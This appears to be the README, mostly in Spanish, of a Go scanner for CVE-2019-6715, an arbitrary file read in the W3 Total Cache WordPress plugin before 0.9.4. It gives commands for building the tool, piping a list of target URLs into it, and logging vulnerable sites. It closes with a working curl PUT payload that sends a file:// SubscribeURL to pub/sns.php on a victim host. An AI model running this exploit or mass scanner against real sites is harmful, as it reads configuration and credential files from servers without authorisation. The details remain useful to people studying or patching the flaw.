
go get github.com/fatih/color
go build
cat list.txt | ./2019-6715
Todas las URL vulnerables se registran en text.log
Descripción: pub/sns.php en el plugin W3 Total Cache anterior a 0.9.4 para WordPress permite a atacantes remotos leer archivos arbitrarios mediante el campo SubscribeURL en datos JSON de SubscriptionConfirmation.
Tipo de vulnerabilidad: lectura de archivos arbitrarios
Proveedor del producto: plugin W3 Total Cache para WordPress de Frederick Townes
Base de código del producto afectado: W3 Total Cache - 0.9.2.6 - 0.9.3, corregido en 0.9.4
Componente afectado: archivo de código fuente afectado: w3-total-cache/pub/sns.php
curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php